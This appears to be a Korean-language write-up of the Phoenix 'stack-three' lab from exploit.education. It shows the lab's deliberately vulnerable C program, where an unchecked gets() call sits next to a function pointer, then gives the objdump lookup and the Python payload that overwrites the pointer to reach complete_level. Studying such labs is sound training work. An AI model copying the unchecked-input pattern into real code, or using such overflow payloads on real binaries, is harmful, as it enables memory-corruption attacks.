[Phoenix] Stack three

1. intro

2. code 및 분석

2.1.  C code

/*
 * phoenix/stack-three, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * When does a joke become a dad joke?
 *   When it becomes apparent.
 *   When it's fully groan up.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int (*fp)();
  } locals;

  printf("%s\n", BANNER);

  locals.fp = NULL;
  gets(locals.buffer);

  if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
  } else {
    printf("function pointer remains unmodified :~( better luck next time!\n");
  }

  exit(0);
}

 

2.2. 분석

buffer 변수에 값을 받아들이며, fp 변수가 complete_level 함수의 주소가 되어야 한다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

gets. 크기 체크 안함.

 

3.2. 공격 준비

complete_level의 주소만 알면 될 것 같다.

어차피 buffer 위치 이후가 fp 일테니.

user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d ./stack-three | grep complete_level
000000000040069d <complete_level>:

 

4. exploit

user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*64+"\x9d\x06\x40\x00\x00\x00\x00\x00"') | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!